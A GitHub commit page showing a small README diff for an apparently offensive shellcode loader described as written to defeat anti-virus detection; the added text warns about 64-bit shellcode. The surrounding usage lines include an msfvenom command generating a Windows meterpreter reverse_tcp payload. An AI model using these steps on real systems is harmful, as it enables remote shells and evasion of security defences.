Skip to content

Commit 4039ceb

Browse files
committed
Add warning to others
1 parent 9b0b381 commit 4039ceb

File tree

1 file changed

+4
-0
lines changed

1 file changed

+4
-0
lines changed

README.md

+4
Original file line numberDiff line numberDiff line change
@@ -6,6 +6,10 @@ written to defeat anti-virus detection.
66

77
Usage
88
=====
9+
10+
Keep in mind that only 64bit shellcode will run in a 64bit process. This can't
11+
autodetect your shellcode architecture.
12+
913
Use msfvenom or metasploit to generate a bit of shellcode as hex format:
1014
```
1115
$ msfvenom -p windows/meterpreter/reverse_tcp -f hex -o rev.hex LHOST=127.0.0.1 LPORT=4444

0 commit comments

Comments
 (0)